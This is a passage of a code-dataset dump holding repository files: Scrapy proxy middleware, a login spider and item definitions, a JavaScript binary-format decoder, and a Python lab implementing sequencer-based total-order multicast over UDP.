"text": "# -*- coding: utf-8 -*-\nimport logging\nimport random\nfrom scrapy.http import Request\nfrom scrapy.downloadermiddlewares.httpproxy import HttpProxyMiddleware\nfrom db import RedisPool\n\n\nclass ProxyMiddleware(HttpProxyMiddleware):\n \"\"\"use random proxy\"\"\"\n proxy_list = []\n\n @classmethod\n def from_crawler(cls, crawler):\n \"\"\"connect redis\n \"\"\"\n redis_host = crawler.settings.get('REDIS_HOST')\n redis_port = crawler.settings.get('REDIS_PORT')\n redis_db = crawler.settings.get('REDIS_DB')\n normal_s = crawler.settings.get('NORMAL_S')\n conn = RedisPool.get_pool(redis_host, redis_port, redis_db)\n cls.proxy_list = list(conn.smembers(normal_s))\n return cls()\n\n def process_request(self, request, spider):\n \"\"\"record this page\n \"\"\"\n if 'next_use_proxy' in request.meta and self.proxy_list and len(self.proxy_list) > 0:\n proxy = random.choice(self.proxy_list)\n request.meta['proxy'] = 'http://%s' % (proxy)\n logging.debug('use proxy %s' % (proxy))\n request.meta['next_use_proxy'] = True\n"
},
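The middleware above only attaches a proxy when the request carries the `next_use_proxy` meta key, so spiders opt in per request. A minimal sketch of the spider side; the URL and spider name are illustrative:

```python
import scrapy

class ProxyDemoSpider(scrapy.Spider):
    name = "proxy_demo"

    def start_requests(self):
        # The meta key below is what ProxyMiddleware.process_request checks.
        yield scrapy.Request("http://example.com",
                             meta={"next_use_proxy": True},
                             callback=self.parse)

    def parse(self, response):
        self.logger.info("fetched via %s", response.request.meta.get("proxy"))
```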
{
"alpha_fraction": 0.37135255336761475,
"alphanum_fraction": 0.4121705889701843,
"avg_line_length": 43.06227111816406,
"blob_id": "366501961c9404a471714ec41a8c168d2f2ce818",
"content_id": "16ce3d88e51ab7a0357fc5126af38278ac87a306",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12029,
"license_type": "permissive",
"max_line_length": 397,
"num_lines": 273,
"path": "/duokan/duokan/dkbson.js",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "BinaryParser = function(t, e) {\n this.bigEndian = t;\n this.allowExceptions = e;\n};\np = BinaryParser.prototype;\nwith (p.encodeFloat = function(t, e, i) {\n var n, o, s, a, l, c = Math.pow(2, i - 1) - 1, u = -c + 1, h = c, d = u - e, f = isNaN(v = parseFloat(t)) || v == -1 / 0 || v == +1 / 0 ? v : 0, p = 0, g = 2 * c + 1 + e + 3, _ = Array(g), m = 0 > (v = 0 !== f ? 0 : v), v = Math.abs(v), y = Math.floor(v), b = v - y;\n for (n = g; n; _[--n] = 0)\n ;\n for (n = c + 2; y && n; _[--n] = y % 2, y = Math.floor(y / 2))\n ;\n for (n = c + 1; b > 0 && n; (_[++n] = ((b *= 2) >= 1) - 0) && --b)\n ;\n for (n = -1; g > ++n && !_[n]; )\n ;\n if (_[(o = e - 1 + (n = (p = c + 1 - n) >= u && h >= p ? n + 1 : c + 1 - (p = u - 1))) + 1]) {\n if (!(s = _[o]))\n for (a = o + 2; !s && g > a; s = _[a++])\n ;\n for (a = o + 1; s && --a >= 0; (_[a] = !_[a] - 0) && (s = 0))\n ;\n }\n for (n = 0 > n - 2 ? -1 : n - 3; g > ++n && !_[n]; )\n ;\n for ((p = c + 1 - n) >= u && h >= p ? ++n : u > p && (p != c + 1 - g && d > p && this.warn(\"encodeFloat::float underflow\"), n = c + 1 - (p = u - 1)), (y || 0 !== f) && (this.warn(y ? \"encodeFloat::float overflow\" : \"encodeFloat::\" + f), p = h + 1, n = c + 2, f == -1 / 0 ? m = 1 : isNaN(f) && (_[n] = 1)), v = Math.abs(p + c), a = i + 1, l = \"\"; --a; l = v % 2 + l, v = v >>= 1)\n ;\n for (v = 0, a = 0, n = (l = (m ? \"1\" : \"0\") + l + _.slice(n, n + e).join(\"\")).length, r = []; n; v += (1 << a) * l.charAt(--n), 7 == a && (r[r.length] = String.fromCharCode(v), v = 0), a = (a + 1) % 8)\n ;\n return r[r.length] = v ? String.fromCharCode(v) : \"\", (this.bigEndian ? r.reverse() : r).join(\"\");\n}, p.encodeInt = function(t, e) {\n var i = Math.pow(2, e), n = [];\n for ((t >= i || -(i >> 1) > t) && this.warn(\"encodeInt::overflow\") && (t = 0), 0 > t && (t += i); t; n[n.length] = String.fromCharCode(t % 256), t = Math.floor(t / 256))\n ;\n for (e = -(-e >> 3) - n.length; e--; n[n.length] = \"\\0\")\n ;\n return (this.bigEndian ? n.reverse() : n).join(\"\");\n}, p.decodeFloat = function(t, e, i) {\n var n, r, o, s = ((s = new this.Buffer(this.bigEndian, t)).checkBuffer(e + i + 1), s), a = Math.pow(2, i - 1) - 1, l = s.readBits(e + i, 1), c = s.readBits(e, i), u = 0, h = 2, d = s.buffer.length + (-e >> 3) - 1;\n do{\n for (n = s.buffer[++d], r = e % 8 || 8, o = 1 << r; o >>= 1; n & o && (u += 1 / h), h *= 2)\n ;\n e -= r;\n }while (e);\n return c == (a << 1) + 1 ? u ? 0 / 0 : l ? -1 / 0 : +1 / 0 : (1 + -2 * l) * (c || u ? c ? Math.pow(2, c - a) * (1 + u) : Math.pow(2, -a + 1) * u : 0);\n}, p.decodeInt = function(t, e, i) {\n var n = new this.Buffer(this.bigEndian, t), r = n.readBits(0, e), o = Math.pow(2, e);\n return i && r >= o / 2 ? r - o : r;\n}, {p: (p.Buffer = function(t, e) {\n this.bigEndian = t || 0, this.buffer = [], this.setBuffer(e);\n }).prototype})\n p.readBits = function(t, e) {\n function i(t, e) {\n for (++e; --e; t = 1073741824 == (1073741824 & (t %= 2147483648)) ? 2 * t : 2 * (t - 1073741824) + 2147483647 + 1)\n ;\n return t;\n }\n if (0 > t || 0 >= e)\n return 0;\n this.checkBuffer(t + e);\n for (var n, r = t % 8, o = this.buffer.length - (t >> 3) - 1, s = this.buffer.length + (-(t + e) >> 3), a = o - s, l = (this.buffer[o] >> r & (1 << (a ? 8 - r : e)) - 1) + (a && (n = (t + e) % 8) ? 
(this.buffer[s++] & (1 << n) - 1) << (a-- << 3) - r : 0); a; l += i(this.buffer[s++], (a-- << 3) - r))\n ;\n return l;\n }, p.setBuffer = function(t) {\n if (t) {\n for (var e, i = e = t.length, n = this.buffer = Array(e); i; n[e - i] = t.charCodeAt(--i))\n ;\n this.bigEndian && n.reverse();\n }\n }, p.hasNeededBits = function(t) {\n return this.buffer.length >= -(-t >> 3);\n }, p.checkBuffer = function(t) {\n if (!this.hasNeededBits(t))\n throw Error(\"checkBuffer::missing bytes\");\n };\np.warn = function(t) {\n if (this.allowExceptions)\n throw Error(t);\n return 1;\n}, p.toSmall = function(t) {\n return this.decodeInt(t, 8, !0);\n}, p.fromSmall = function(t) {\n return this.encodeInt(t, 8, !0);\n}, p.toByte = function(t) {\n return this.decodeInt(t, 8, !1);\n}, p.fromByte = function(t) {\n return this.encodeInt(t, 8, !1);\n}, p.toShort = function(t) {\n return this.decodeInt(t, 16, !0);\n}, p.fromShort = function(t) {\n return this.encodeInt(t, 16, !0);\n}, p.toWord = function(t) {\n return this.decodeInt(t, 16, !1);\n}, p.fromWord = function(t) {\n return this.encodeInt(t, 16, !1);\n}, p.toInt = function(t) {\n return this.decodeInt(t, 32, !0);\n}, p.fromInt = function(t) {\n return this.encodeInt(t, 32, !0);\n}, p.toDWord = function(t) {\n return this.decodeInt(t, 32, !1);\n}, p.fromDWord = function(t) {\n return this.encodeInt(t, 32, !1);\n}, p.toFloat = function(t) {\n return this.decodeFloat(t, 23, 8);\n}, p.fromFloat = function(t) {\n return this.encodeFloat(t, 23, 8);\n}, p.toDouble = function(t) {\n return this.decodeFloat(t, 52, 11);\n}, p.fromDouble = function(t) {\n return this.encodeFloat(t, 52, 11);\n};\nbase64 = function() {\n function t(t, e) {\n var i = o.indexOf(t.charAt(e));\n if (-1 === i)\n throw \"Cannot decode base64\";\n return i;\n }\n function e(e) {\n var i, n, o = 0, s = e.length, a = [];\n if (e += \"\", 0 === s)\n return e;\n if (0 !== s % 4)\n throw \"Cannot decode base64\";\n for (e.charAt(s - 1) === r && (o = 1, e.charAt(s - 2) === r && (o = 2), s -= 4), i = 0; s > i; i += 4)\n n = t(e, i) << 18 | t(e, i + 1) << 12 | t(e, i + 2) << 6 | t(e, i + 3), a.push(String.fromCharCode(n >> 16, 255 & n >> 8, 255 & n));\n switch (o) {\n case 1:\n n = t(e, i) << 18 | t(e, i + 1) << 12 | t(e, i + 2) << 6, a.push(String.fromCharCode(n >> 16, 255 & n >> 8));\n break;\n case 2:\n n = t(e, i) << 18 | t(e, i + 1) << 12, a.push(String.fromCharCode(n >> 16));\n }\n return a.join(\"\");\n }\n function i(t, e) {\n var i = t.charCodeAt(e);\n if (i > 255)\n throw \"INVALID_CHARACTER_ERR: DOM Exception 5\";\n return i;\n }\n function n(t) {\n if (1 !== arguments.length)\n throw \"SyntaxError: exactly one argument required\";\n t += \"\";\n var e, n, s = [], a = t.length - t.length % 3;\n if (0 === t.length)\n return t;\n for (e = 0; a > e; e += 3)\n n = i(t, e) << 16 | i(t, e + 1) << 8 | i(t, e + 2), s.push(o.charAt(n >> 18)), s.push(o.charAt(63 & n >> 12)), s.push(o.charAt(63 & n >> 6)), s.push(o.charAt(63 & n));\n switch (t.length - a) {\n case 1:\n n = i(t, e) << 16, s.push(o.charAt(n >> 18) + o.charAt(63 & n >> 12) + r + r);\n break;\n case 2:\n n = i(t, e) << 16 | i(t, e + 1) << 8, s.push(o.charAt(n >> 18) + o.charAt(63 & n >> 12) + o.charAt(63 & n >> 6) + r);\n }\n return s.join(\"\");\n }\n var r = \"=\", o = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\", s = \"1.0\";\n return {decode: e,encode: n,VERSION: s};\n }();\n\ndkbson = function() {\n function t(t) {\n return decodeURIComponent(escape(t));\n }\n function e(t, e) {\n for (var i = 1, n = 
t.charCodeAt(e), r = n, o = 128; 4 >= i && 0 != (o & n); )\n o >>= 1, i++, r = (r << 1) % 256;\n for (var s = 0; i - 1 > s; s++)\n r >>= 1;\n var a = r;\n for (s = 1; i > s; s++)\n a = (a << 8) + t.charCodeAt(e + s);\n return [e + i, a];\n }\n function i(i, n, r) {\n var o, s = new BinaryParser();\n if (i == l.TYPE_INT8)\n o = s.toSmall(n.substr(r, 1)), r++;\n else if (i == l.TYPE_INT16)\n o = s.toShort(n.substr(r, 2)), r += 2;\n else if (i == l.TYPE_INT32)\n o = s.toInt(n.substr(r, 4)), r += 4;\n else if (i == l.TYPE_INT64)\n o = s.decodeInt(n.substr(r, 8), 64, !0), r += 8;\n else if (i == l.TYPE_DOUBLE)\n o = s.toDouble(n.substr(r, 8)), r += 8;\n else if (i == l.TYPE_FLOAT){\n o = s.toFloat(n.substr(r, 4)), r += 4;\n }\n else if (i == l.TYPE_STRING) {\n var a = e(n, r);\n r = a[0];\n var c = a[1];\n o = n.substr(r, c), o = t(o), r += c;\n } else\n i == l.TYPE_NULL ? (o = null, r++) : i == l.TYPE_BOOL ? (o = 0 === n.charCodeAt(r) ? !1 : !0, r++) : i == l.TYPE_REAL16 ? (o = s.toShort(n.substr(r, 2)), o /= 100, r += 2) : i == l.TYPE_REAL24 ? (o = s.toInt(n.substr(r, 3) + \"\\0\"), o /= 1e3, r += 3) : i == l.TYPE_REAL32 ? (o = s.toInt(n.substr(r, 4)), o /= 1e4, r += 4) : console.log(\"error: unsupported type:\" + i.charCodeAt(0));\n return [r, o];\n }\n function n(t, o) {\n var s = [], a = e(t, o);\n o = a[0];\n for (var c = a[1], u = c; u-- > 0; ) {\n var h, d, f = t.charCodeAt(o), p = o + 1;\n f == l.TYPE_OBJECT ? (h = r(t, p), o = h[0], d = h[1]) : f == l.TYPE_ARRAY ? (h = n(t, p), o = h[0], d = h[1]) : (h = i(f, t, p), o = h[0], d = h[1]), s.push(d);\n }\n return [o, s];\n }\n function r(t, o) {\n var s = e(t, o);\n o = s[0];\n for (var a = s[1], c = {}, u = a; u-- > 0; ) {\n var h, d = t.charCodeAt(o), f = \"\", p = \"\";\n for (h = o + 1; \"\\0\" != t.charAt(h); h++)\n f += t.charAt(h);\n h++;\n var g;\n d == l.TYPE_OBJECT ? (g = r(t, h), o = g[0], p = g[1]) : d == l.TYPE_ARRAY ? (g = n(t, h), o = g[0], p = g[1]) : (g = i(d, t, h), o = g[0], p = g[1]), c[f] = p\n }\n return [o, c];\n }\n var a = base64, l = {TYPE_INT8: 1,TYPE_INT16: 2,TYPE_INT32: 3,TYPE_INT64: 4,TYPE_FLOAT: 16,TYPE_DOUBLE: 17,TYPE_REAL16: 18,TYPE_REAL24: 19,TYPE_REAL32: 20,TYPE_STRING: 32,TYPE_BOOL: 48,TYPE_NULL: 49,TYPE_OBJECT: 64,TYPE_ARRAY: 65};\n return {decode: function(t) {\n var e = a.decode(t), i = r(e, 0);\n return i[1];\n }};\n }();\n\nexports.dkbson = dkbson;\n\nvar request = require('request');\nvar sleep = require('sleep');\n// DO NOT ADD console.log, use console.error instead or it will make other program confused\nvar req = function(options_or_url, end_cb){\n var MAX_RETRY = 10;\n var TIMEOUT_MS = 3000;\n var SLEEP_MS = 500;\n if ('string' == typeof(options_or_url)){\n var url = options_or_url;\n options = {};\n options.url = url;\n }\n else{\n options = options_or_url;\n }\n if (!('timeout' in options)){\n options.timeout = 3000;\n }\n function retry(depth){\n if (depth >= MAX_RETRY) return;\n var promise = new Promise(function(resolve, reject){\n request(options, function(error, response, body){\n if (error){\n if (null !== reject){\n reject(error);\n }\n console.error('error_js: '+options.url+\"\\n\"+error);\n sleep.usleep(SLEEP_MS*1000);\n return ;\n }\n if (response.statusCode == 200){\n resolve(body);\n }\n });\n });\n promise.then(end_cb, function(error) { retry(depth+1); });\n }\n retry(0);\n return ;\n};\nexports.req = req;\n"
},
{
"alpha_fraction": 0.49864864349365234,
"alphanum_fraction": 0.5013513565063477,
"avg_line_length": 27.461538314819336,
"blob_id": "0fe0f2cf35e91f6f7888b1e594acac120d1b71b3",
"content_id": "86f4d48e16397a2a03f26840f306964f6cf2dad1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 740,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 26,
"path": "/zhihu/zhihu/spiders/login.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass LoginSpider(scrapy.Spider):\n name = \"login\"\n allowed_domains = [\"zhihu.com\"]\n start_urls = [\n 'https://www.zhihu.com/login/email',\n ]\n\n def parse(self, response):\n url='https://www.zhihu.com/login/email'\n xsrf=response.xpath('//div[@class=\"view view-signin\"]//input[@name=\"_xsrf\"]/@value').extract()\n return scrapy.FormRequest(\n url=url,\n formdata={'email': '[email protected]',\n 'password':'',\n 'remember_me': 'true',\n '_xsrf': xsrf[0],\n },\n callback=self.after_login\n )\n\n def after_login(self, response):\n print response.body\n"
},
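An alternative to hand-extracting `_xsrf` in `LoginSpider`: `FormRequest.from_response` copies hidden form fields from the page automatically. A sketch under that assumption; the credentials are placeholders:

```python
import scrapy

class LoginSpiderAlt(scrapy.Spider):
    name = "login_alt"
    allowed_domains = ["zhihu.com"]
    start_urls = ["https://www.zhihu.com/login/email"]

    def parse(self, response):
        # from_response pre-fills hidden inputs such as _xsrf from the page's
        # form, so only the visible credentials need to be supplied.
        return scrapy.FormRequest.from_response(
            response,
            formdata={"email": "user@example.com", "password": "secret"},
            callback=self.after_login,
        )

    def after_login(self, response):
        self.logger.info("login response: %d bytes", len(response.body))
```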
{
"alpha_fraction": 0.7162162065505981,
"alphanum_fraction": 0.7162162065505981,
"avg_line_length": 13.800000190734863,
"blob_id": "403cae8cceb931deac5e8fde050fcbab05433a94",
"content_id": "bf417cc541edfe62ea3108d35eba1990d0e92a4a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 5,
"path": "/small/xiaoying/readme.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "```\npip install airflow[slack]\nairflow initdb\nairflow scheduler -sd .\n```\n"
},
{
"alpha_fraction": 0.6407982110977173,
"alphanum_fraction": 0.6430155038833618,
"avg_line_length": 21.5,
"blob_id": "2cc355e7e706cb775134dace3302ed0dffc5067d",
"content_id": "a3ebd91e8a34ff7e259fd39969a562d733dbd51b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 20,
"path": "/caoporn/caoporn/items.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass VideoItem(scrapy.Item):\n name = scrapy.Field()\n url = scrapy.Field()\n hash = scrapy.Field()\n cover = scrapy.Field()\n length = scrapy.Field()\n views = scrapy.Field()\n is_hd = scrapy.Field()\n is_private = scrapy.Field()\n _create_time = scrapy.Field()\n\n"
}
] | 43 |
YASHAMWAN/Data-Preprocessing | https://github.com/YASHAMWAN/Data-Preprocessing | 93d758d983dcc62a1e004fe9a1ace31e5581c0b4 | 36d695c5165b0447655bdfd455f694cb6b02c6b1 | 309e707dc9259c7a4d5688d6912a126f86ed5c6f | refs/heads/master | 2020-05-27T12:42:34.109154 | 2019-05-26T00:00:50 | 2019-05-26T00:00:50 | 188,622,805 | 0 | 0 | null | 2019-05-25T23:54:30 | 2019-05-26T00:00:52 | 2019-05-26T00:02:54 | Python |
[
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.7463768124580383,
"avg_line_length": 24.55555534362793,
"blob_id": "42d9c35587f77de7bac044b08bcda1b7c47d8dbd",
"content_id": "9b3fddb0531e83df687457434a92d99ac435e805",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 690,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 27,
"path": "/encoding.py",
"repo_name": "YASHAMWAN/Data-Preprocessing",
"src_encoding": "UTF-8",
"text": "#data preprocessing\n\n#import libraries\nimport numpy as np\nimport matplotlib as plt\nimport pandas as pd\n\n# get current working directory\nimport os\nprint(os.getcwd())\n\n#set current working directory'\nos.chdir('C:/Users/ThinkPad/Desktop/Machine Learning A-Z/Part 1 - Data Preprocessing/Data_Preprocessing')\n#import dataset\ndataset = pd.read_csv('Data.csv')\nprint(dataset)\n\nX = dataset.iloc[ :, :-1].values\ny = dataset.iloc[:, 3].values\nprint(X)\n#taking care of missing data using Univariate feature imputation\nfrom sklearn.impute import SimpleImputer\nimputer = SimpleImputer(missing_values = np.nan, strategy = 'mean')\nimputer.fit(X[:, 1:3])\nX[:, 1:3] = imputer.transform(X[: ,1:3])\n\nprint(X)\n"
}
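The `fit`/`transform` pair in `encoding.py` can be collapsed into a single `fit_transform` call. A tiny standalone example of `SimpleImputer` filling missing values with column means:

```python
import numpy as np
from sklearn.impute import SimpleImputer

X = np.array([[1.0, 2.0],
              [np.nan, 4.0],
              [5.0, np.nan]])
imputer = SimpleImputer(missing_values=np.nan, strategy="mean")
X_filled = imputer.fit_transform(X)   # fit on X and fill its gaps in one step
print(X_filled)                       # nan -> column means (3.0 in each column)
```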
] | 1 |
doogrammargood/distributed_systems_lab2 | https://github.com/doogrammargood/distributed_systems_lab2 | bc43ba7fa2162ea2cab1ce15ec4eed63434cc5f4 | a175cf0103fab3d08e6ee4e875dc95895151173d | 3de09badf7b05446ecf1a8b42134985b8fb28c9b | refs/heads/master | 2020-05-05T00:40:22.397339 | 2019-04-09T07:22:59 | 2019-04-09T07:22:59 | 179,582,559 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6602683663368225,
"alphanum_fraction": 0.6718226075172424,
"avg_line_length": 35.75342559814453,
"blob_id": "fa156591e8da0e42ac44da36c48f853c459b6300",
"content_id": "41037f170ce73a4ac2a37ea219b760db86d1fabd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5366,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 146,
"path": "/processes.py",
"repo_name": "doogrammargood/distributed_systems_lab2",
"src_encoding": "UTF-8",
"text": "import sys\nimport socket\nimport threading\nimport pickle\nfrom termcolor import colored\nimport random\nimport time\n\n#def __main__():\n#print sys.argv\ntest_behavior = 2\n#test behavior 0 accepts messages from the command line.\n# '''''''''''''1 sends a message to the next process.\n\nprocess_id = int(sys.argv[1]) #proccess id is set by command line.\n#sequencer_address = sys.argv[2] #the address of the sequencer.\nsequencer_address =('', int(sys.argv[2]))\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind(('',12000+process_id))\n\ncolors = {1: 'red', 2: 'green', 3: 'blue', 4: 'magenta'} #used to pretty print messages which have been delivered\n\nclock = 0 #This is the number of messages which have been sent\nexpected_sequence_number = 1\nhold_back_list = []\n\ndelivered_messages = [] #a list of messages which have been delivered\ndef wrap_message(message):\n global clock\n dict = {\"sender_id\": process_id, \"message_contents\": message, \"local_clock\": clock}#, \"seq_num\": 1}\n return pickle.dumps(dict)\n\nlock = threading.Lock()\ndef send_message(message):\n global clock\n lock.acquire()\n try:\n sock.sendto(wrap_message(message), sequencer_address)\n clock = clock+1\n finally:\n lock.release()\n\ndef deliver_message(message):\n # print \"You've got mail!\"\n # print message\n delivered_messages.append(message)\n global expected_sequence_number\n expected_sequence_number +=1\n if test_behavior == 1:\n if int(message['message_contents'][0]) == process_id:\n next_process = (process_id +1)%4\n if next_process == 0:\n next_process = 4\n send_message(\"%d please forward this message\" %next_process)\n\ndef pretty_print_messages(queue):\n #prints the messages in delivered messages\n for message in queue:\n text = colored(message[\"message_contents\"], colors[message[\"sender_id\"]])\n print text\n\ncascade_lock = threading.Lock()\n\ndef cascade_deliveries():\n cascade_lock.acquire()\n try:\n global hold_back_list\n global expected_sequence_number\n hold_back_list = sorted(hold_back_list, key = lambda x: x[\"seq_num\"])\n #well sort the messages, then check that\n for message in hold_back_list:\n if expected_sequence_number == message[\"seq_num\"]:\n deliver_message(message)\n #hold_back_list.remove(message)\n hold_back_list = filter(lambda message: message[\"seq_num\"]>expected_sequence_number,hold_back_list)\n finally:\n cascade_lock.release()\n return\n\ndef receive_message(message_from_seq):\n delay=random.random()*5\n time.sleep(delay) #stimulate delay\n global expected_sequence_number\n global delivered_messages\n global hold_back_list\n print \"recieved message\", message_from_seq\n print expected_sequence_number\n if message_from_seq[\"seq_num\"] == expected_sequence_number:\n deliver_message(message_from_seq)\n cascade_deliveries()\n elif not message_from_seq[\"seq_num\"] in map(lambda x: x[\"seq_num\"],hold_back_list):\n #as long as this isnt a duplicate\n cascade_lock.acquire()\n try:\n hold_back_list.append(message_from_seq)\n finally:\n cascade_lock.release()\ndef listen_for_message():\n #listens for messages from keyboard, only for test_behavior = 0\n global clock\n while True:\n message = input()\n send_message(message)\ndef send_messages_randomly():\n #This method is specifically for test 2\n global clock\n global test2_ongoing\n while test2_ongoing:\n delay=random.random()\n time.sleep(delay)\n send_message(\"%d\" %clock)\n\nif test_behavior ==0:\n #This is the default behavior, where the user inputs a message to send to the other processes.\n 
input_thread = threading.Thread(target = listen_for_message)\n input_thread.start()\n while True:\n message, address = sock.recvfrom(1024)\n receive_thread = threading.Thread(target = receive_message, args = (pickle.loads(message),))\n receive_thread.start()\n #receive_message(pickle.loads(message))\nelif test_behavior == 1:\n #This is the test behavior, where process 1 sends a message containing '2',\n #process 2 sends a message containing '3', and so forth cyclically.\n #Then we check after 10 messages that the delivered messages follow the desired order.\n if process_id == 1:\n send_message(\"2 please forward this message.\")\n while len(delivered_messages)<10:\n message, address = sock.recvfrom(1024)\n receive_thread = threading.Thread(target = receive_message, args = (pickle.loads(message),))\n receive_thread.start()\n pretty_print_messages(delivered_messages)\nelif test_behavior == 2:\n #In this test behavior, each process will continually send messages.\n time.sleep(15) #so that there's enough time to start all of the processes before any send messages.\n print \"starting\"\n test2_ongoing = True\n sending_thread = threading.Thread(target = send_messages_randomly)\n sending_thread.start()\n while len(delivered_messages)<10:\n message, address = sock.recvfrom(1024)\n receive_thread = threading.Thread(target = receive_message, args = (pickle.loads(message),))\n receive_thread.start()\n test2_ongoing = False\n\n pretty_print_messages(delivered_messages)\n"
},
{
"alpha_fraction": 0.5920939445495605,
"alphanum_fraction": 0.6064165234565735,
"avg_line_length": 33.22549057006836,
"blob_id": "588bf33cb18668e185eb6180b1314becc9017b32",
"content_id": "710711cefaf805b6f26235cdeca5fdbb379be7a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3491,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 102,
"path": "/sequencer.py",
"repo_name": "doogrammargood/distributed_systems_lab2",
"src_encoding": "UTF-8",
"text": "import sys\nimport socket\nimport threading\n#import thread\nimport pickle\nimport os\nimport random\nimport time\n\nVclock={1:0,2:0,3:0,4:0}\nsequence=0\nhold_back_list = []\n\nADDRESS=('localhost',8080)\ng_conn_pool=[]\nserver = None\nserver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver.bind(ADDRESS)\n\nclient_address1 =('', int(sys.argv[1]))\nclient_address2 =('', int(sys.argv[2]))\nclient_address3 =('', int(sys.argv[3]))\nclient_address4 =('', int(sys.argv[4]))\nclient={1:client_address1,2:client_address2,3:client_address3,4:client_address4}\n\n\nprint(\"Sequenser start running\")\n\ndef wrap_message(message,seq_num,sender_id):\n dict = {\"message_contents\": message, \"seq_num\": seq_num,\"sender_id\": sender_id}\n return pickle.dumps(dict)\n\ndef send_message(message,seq_num,sender_id):\n #server.sendall(wrap_message(message,seq_num)\n for n in client:\n server.sendto(wrap_message(message,seq_num,sender_id), client[n])\n\n\ndef client_number(address):\n #returns the client number from a given address.\n #print address\n return [index for index in range(1,5) if client[index][1]==address[1]][0]\n\ndef receive_message(message_from_client, address):\n thread = threading.Thread(target = run, args=(message_from_client,))\n #add address when receving instead of initializion\n # if address not in client:\n # client.add(address)\n thread.start()\n\nlock = threading.Lock()\n\ndef run(message_from_client):\n global Vclock\n global sequence\n global hold_back_list\n delay=random.random()*5\n time.sleep(delay) #stimulate delay\n print(\"receive message from id:%d,with LC:%d at %f\"%(message_from_client[\"sender_id\"],message_from_client[\"local_clock\"],time.time())) #for check purpose\n print message_from_client[\"local_clock\"]\n print Vclock[message_from_client[\"sender_id\"]]\n if message_from_client[\"local_clock\"] == Vclock[message_from_client[\"sender_id\"]]:\n print \"in if statement\"\n print sequence\n lock.acquire()\n try:\n sequence+=1\n Vclock[message_from_client[\"sender_id\"]]+=1\n send_message(message_from_client[\"message_contents\"],sequence,+message_from_client[\"sender_id\"])\n check=-1\n while (check < 0):\n check+=1\n for n in hold_back_list:\n check+=1\n if (message_from_client[\"sender_id\"] == n[\"sender_id\"]):\n if(Vclock[message_from_client[\"sender_id\"]] == n[\"local_clock\"]):\n send_message(n[\"message_contents\"],sequence+1,n[\"sender_id\"])\n print(\"send message:%s with sequence:%d,sender_id:%d localclock:%d\"%(n[\"message_contents\"],sequence+1,n[\"sender_id\"],n[\"local_clock\"]))\n Vclock[message_from_client[\"sender_id\"]]+=1\n sequence+=1\n check-=1\n check-=len(hold_back_list)\n hold_back_list.remove(n)\n finally:\n lock.release()\n\n else:\n print \"hold back list appended\"\n print Vclock\n lock.acquire()\n try:\n hold_back_list.append(message_from_client)\n finally:\n lock.release()\n print hold_back_list\n\nif __name__ == '__main__':\n while True:\n message,address = server.recvfrom(1024)\n receive_message(pickle.loads(message), address)\n print \"got a message from\"\n print address\n"
}
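Stripped of sockets and threads, the ordering guarantee that `processes.py` and `sequencer.py` implement is the classic hold-back rule: deliver strictly in sequence-number order and park early arrivals until the gap closes. A minimal sketch of that rule:

```python
# Hold-back delivery: park out-of-order messages, flush in sequence order.
def make_deliverer(deliver):
    expected = [1]
    held = {}
    def on_receive(msg):               # msg carries a "seq_num" field
        held[msg["seq_num"]] = msg
        while expected[0] in held:
            deliver(held.pop(expected[0]))
            expected[0] += 1
    return on_receive

recv = make_deliverer(lambda m: print("delivered", m["seq_num"]))
for s in (2, 3, 1, 5, 4):              # out-of-order arrival
    recv({"seq_num": s})               # still prints 1, 2, 3, 4, 5
```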
] | 2 |
Dey-Sumit/Tababble_api | https://github.com/Dey-Sumit/Tababble_api | 34d4c179bf1342c313eea3294c88e100c15110af | 74654cf26bf5034f3a81259e7d24767b52da210b | 13a5606e4d7440e91e9140f3d090bcba0c698e3c | refs/heads/master | 2022-12-09T22:32:42.275914 | 2020-09-06T15:01:54 | 2020-09-06T15:01:54 | 293,299,644 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7388441562652588,
"alphanum_fraction": 0.7446964383125305,
"avg_line_length": 25.288461685180664,
"blob_id": "ea1aed53c1842659b3b62eb7411cef7e7ed8e78d",
"content_id": "509c1a10d17811909952a31a12567c614dc937cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1367,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 52,
"path": "/README.md",
"repo_name": "Dey-Sumit/Tababble_api",
"src_encoding": "UTF-8",
